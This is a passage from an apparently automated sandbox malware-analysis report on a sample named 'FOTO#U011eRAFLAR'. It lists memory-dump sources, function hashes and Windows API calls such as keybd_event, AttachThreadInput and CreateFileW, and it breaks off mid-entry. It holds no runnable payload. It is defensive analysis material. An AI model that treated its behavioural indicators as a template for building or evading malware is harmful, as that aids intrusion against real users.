                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
                                                                      • Instruction ID: 74ba4c562492b1f6dd64aba6fe955bdae6bcdf1edca80a9454308d8bf476e865
                                                                      • Opcode Fuzzy Hash: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
                                                                      • Instruction Fuzzy Hash: A90126722043056BE3218E698885A5AFBE9FF89370F250A1DE18483280EA30A885CB74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                                      • Instruction ID: 1855fc60c15ec2c7764e2ad92032f41c9acd63dc93ea89b8f5bd4f93dabe37b3
                                                                      • Opcode Fuzzy Hash: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                                      • Instruction Fuzzy Hash: 2DF02833505624DBD6313A69DC05B5A7398DF82338F180B15F865931C1EFB0D8028AB1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID:
                                                                      • API String ID: 176396367-0
                                                                      • Opcode ID: daac91e4791b5f8b8a51bed27b0636e3484bfa385f497e03164fd17063fc8ed1
                                                                      • Instruction ID: 09db4601834b3cfde35e7d938afc50a84c8861be535fef9afaff13aca0f06208
                                                                      • Opcode Fuzzy Hash: daac91e4791b5f8b8a51bed27b0636e3484bfa385f497e03164fd17063fc8ed1
                                                                      • Instruction Fuzzy Hash: C6F0A4B26007147ED7149F28E806AA6BBA4EF54360F14853AFA19CB1D1DB71E55087B0
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D42DB9,00000001,00000364,?,00D2FD75,?,?,00D1B63D,00000000,?,?), ref: 00D44C4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 7c94bbe3adb13b33f220808ccde559ae84f2aef89a08cf5068302f0564bab13e
                                                                      • Instruction ID: b6020aa8c8dad9f272f4ffc16a27b5c36d38b885179692f18d0d05df1b596a47
                                                                      • Opcode Fuzzy Hash: 7c94bbe3adb13b33f220808ccde559ae84f2aef89a08cf5068302f0564bab13e
                                                                      • Instruction Fuzzy Hash: F5F05E31A07224ABDB216E669D85B5E7788FF417B1F1D8125B915EB191CA70E88086B0
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D2FD75,?,?,00D1B63D,00000000,?,?,?,00D8106C,00DAD0D0,?,00D5242E), ref: 00D437E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 9825b4c325538b042be0cea8ed98e168660c4eaab67e01baaa99fd3511195b93
                                                                      • Instruction ID: 9fca3c618e9fc03b81a50b916ed50e79cb5c57033367aae1d4b9cc9fa508767a
                                                                      • Opcode Fuzzy Hash: 9825b4c325538b042be0cea8ed98e168660c4eaab67e01baaa99fd3511195b93
                                                                      • Instruction Fuzzy Hash: F3E0EDF1300264A7E6212AAE9C02F5B3648EF027B0F0D0020FCC5E6981DB21DE0086F0
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,PO,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D1690F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 2cb2f193b24828a70d33b199459d2dee3b8b4f1d8bcfb024d43ac38f0a3b7250
                                                                      • Instruction ID: 6912815086ff94873c98b055fabee286ab90cf50586fade43151c8d6d88d8f95
                                                                      • Opcode Fuzzy Hash: 2cb2f193b24828a70d33b199459d2dee3b8b4f1d8bcfb024d43ac38f0a3b7250
                                                                      • Instruction Fuzzy Hash: A9F03075105711DFC7349F74E494892B7E4EF14325314897EE1D682650CB32DC80DF20
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00D5FA27,00DD3650,00000002), ref: 00D7CC44
                                                                        • Part of subcall function 00D7CB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00D7CC37,?,?,?), ref: 00D7CB77
                                                                        • Part of subcall function 00D7CB55: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00D7CC37,?,?,?,?,00D5FA27,00DD3650,00000002), ref: 00D7CB8C
                                                                        • Part of subcall function 00D7CB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00D7CC37,?,?,?,?,00D5FA27,00DD3650,00000002), ref: 00D7CB98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$Write
                                                                      • String ID:
                                                                      • API String ID: 3847668363-0
                                                                      • Opcode ID: 03b64fddd47ad964c5fb65113011784f4dde145045f6e7c7d8ff4bece3d00d5b
                                                                      • Instruction ID: e3022ec579caa9b2dfed4da78d1154fe5c06ca8b20c747f973683af73d9129a4
                                                                      • Opcode Fuzzy Hash: 03b64fddd47ad964c5fb65113011784f4dde145045f6e7c7d8ff4bece3d00d5b
                                                                      • Instruction Fuzzy Hash: D6E03976500704EFC7219F4AD841CAAB7F8FF81221310852FF95AC2510E7B1AA04DBB0
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D147EF
                                                                        • Part of subcall function 00D184E7: _wcslen.LIBCMT ref: 00D184FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 739ef06843a613ccb625c6aa01ae9da97edd212e4f59cf35f170cbd17dab5410
                                                                      • Instruction ID: acc387996a2cde88be8da98a9a37ded4e3e53177fbd40e73100d4856bc6ef2a1
                                                                      • Opcode Fuzzy Hash: 739ef06843a613ccb625c6aa01ae9da97edd212e4f59cf35f170cbd17dab5410
                                                                      • Instruction Fuzzy Hash: 1AE0C276A002246BCB21E2989C06FEA77EEDFC87A0F0400B1FC09D7248DD64AD8086B0
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00D506A5,?,?,00000000,?,00D506A5,00000000,0000000C), ref: 00D50358
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: b10a361b5d8bde2bbbe2ff904a41c31977682f3b1a7eefb7774562088e9c4b1c
                                                                      • Instruction ID: 798ed4561d91f65b830eb619a78a61e2ba847fa8dfbf818b1bf982e9352850b6
                                                                      • Opcode Fuzzy Hash: b10a361b5d8bde2bbbe2ff904a41c31977682f3b1a7eefb7774562088e9c4b1c
                                                                      • Instruction Fuzzy Hash: 0CD06C3215020DBBDF028F84DD06EDA3BAAFB48714F014000BE1896120C736E821AB90
                                                                      APIs
                                                                        • Part of subcall function 00D170E5: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D1AE0C,?,00008000), ref: 00D17113
                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00D875FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1214770103-0
                                                                      • Opcode ID: 5080ed08ad37203d65bcc137831ab39f40a0b56131d7b64b36df209136c71319
                                                                      • Instruction ID: ef7ab5a6b2d4bdd168ece5653f27aba8c442f9c33e46e1a8d8743c831d2bbfec
                                                                      • Opcode Fuzzy Hash: 5080ed08ad37203d65bcc137831ab39f40a0b56131d7b64b36df209136c71319
                                                                      • Instruction Fuzzy Hash: AB815E30608301AFC715EF28D491AA9B7E1EF89714F18456DF8955B3A1DB30ED85CBB2
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(?,?,00000000,00D5306C), ref: 00D17C0E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 5d5b1c58f9da4256685286159b42640b21e10f0081acde3b50fe7608f74c1c38
                                                                      • Instruction ID: a8c8981d4314d24dc19be713b437587bbc787c912529a677ef4298c447507e34
                                                                      • Opcode Fuzzy Hash: 5d5b1c58f9da4256685286159b42640b21e10f0081acde3b50fe7608f74c1c38
                                                                      • Instruction Fuzzy Hash: BFE0B675448B11DFC7314F1AE804452FBF4FFE17613244A2ED0E582670DBB05886CBA0
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 01236B21
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696671381.0000000001234000.00000040.00000020.00020000.00000000.sdmp, Offset: 01234000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1234000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: a59817cf479dda0b1b5c5c72af2e410ffc8aa8869a3529aecc5331dfc8d8f662
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: 9CE0E67494010DEFDB00EFF4D54969E7FB4EF04301F100161FD01E2281D7319E508A62
                                                                      APIs
                                                                        • Part of subcall function 00D2B021: GetWindowLongW.USER32(?,000000EB), ref: 00D2B032
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00DA950C
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DA954D
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00DA9591
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DA95BB
                                                                      • SendMessageW.USER32 ref: 00DA95E4
                                                                      • GetKeyState.USER32(00000011), ref: 00DA967D
                                                                      • GetKeyState.USER32(00000009), ref: 00DA968A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DA96A0
                                                                      • GetKeyState.USER32(00000010), ref: 00DA96AA
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DA96DB
                                                                      • SendMessageW.USER32 ref: 00DA9702
                                                                      • SendMessageW.USER32(?,00001030,?,00DA7D85), ref: 00DA980A
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00DA9820
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DA9833
                                                                      • SetCapture.USER32(?), ref: 00DA983C
                                                                      • ClientToScreen.USER32(?,?), ref: 00DA98A1
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DA98AE
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DA98C8
                                                                      • ReleaseCapture.USER32 ref: 00DA98D3
                                                                      • GetCursorPos.USER32(?), ref: 00DA990B
                                                                      • ScreenToClient.USER32(?,?), ref: 00DA9918
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DA9972
                                                                      • SendMessageW.USER32 ref: 00DA99A0
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DA99DD
                                                                      • SendMessageW.USER32 ref: 00DA9A0C
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DA9A2D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DA9A3C
                                                                      • GetCursorPos.USER32(?), ref: 00DA9A5A
                                                                      • ScreenToClient.USER32(?,?), ref: 00DA9A67
                                                                      • GetParent.USER32(?), ref: 00DA9A85
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DA9AEC
                                                                      • SendMessageW.USER32 ref: 00DA9B1D
                                                                      • ClientToScreen.USER32(?,?), ref: 00DA9B76
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DA9BA6
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DA9BD0
                                                                      • SendMessageW.USER32 ref: 00DA9BF3
                                                                      • ClientToScreen.USER32(?,?), ref: 00DA9C40
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DA9C74
                                                                        • Part of subcall function 00D2ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D2ADD2
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA9CF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3429851547-4164748364
                                                                      • Opcode ID: 6f8fa1eacc40bdc00e98f99a693a08655ec8e7302fd2d741d62b7abe0beaa782
                                                                      • Instruction ID: 45873dc1151f0523f60603626d03f5096331a6f562f8b6a80759a2f827f21fd0
                                                                      • Opcode Fuzzy Hash: 6f8fa1eacc40bdc00e98f99a693a08655ec8e7302fd2d741d62b7abe0beaa782
                                                                      • Instruction Fuzzy Hash: 1F429E34608340AFDB25DF24CC95AAABBE5FF4A320F180619F595872A1CB71E950CFB1
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00DA4828
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00DA483D
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00DA485C
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00DA4880
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00DA4891
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00DA48B0
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00DA48E3
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00DA4909
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00DA4944
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DA498B
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00DA49B3
                                                                      • IsMenu.USER32(?), ref: 00DA49CC
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DA4A27
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00DA4A55
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA4AC9
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00DA4B18
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00DA4BB7
                                                                      • wsprintfW.USER32 ref: 00DA4BE3
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DA4BFE
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DA4C26
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DA4C48
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DA4C68
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00DA4C8F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      • Opcode ID: e45034100442be102534ac5f234407c4573a24e41811f972ff464a1ab451bd86
                                                                      • Instruction ID: 5959281aba89f53021e92fd303bc36314ce26eb59eea66d3dbe019f0845a4b7a
                                                                      • Opcode Fuzzy Hash: e45034100442be102534ac5f234407c4573a24e41811f972ff464a1ab451bd86
                                                                      • Instruction Fuzzy Hash: 0D12F071600354ABEB248F68DC49FAE7BB8EF86320F184529F515DA2E1DBB4D941CB70
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D2EFB7
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D2EFD4
                                                                      • IsIconic.USER32(00000000), ref: 00D2EFDD
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D2EFEF
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D2F005
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D2F00C
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D2F018
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D2F029
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D2F031
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00D2F039
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D2F03C
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2F055
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D2F060
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2F06A
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D2F06F
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2F078
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D2F07D
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D2F087
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00D2F08C
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D2F08F
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D2F0AD
                                                                      • AttachThreadInput.USER32(?,00000000,00000000), ref: 00D2F0B5
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00D2F0BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                                      • String ID: Shell_TrayWnd
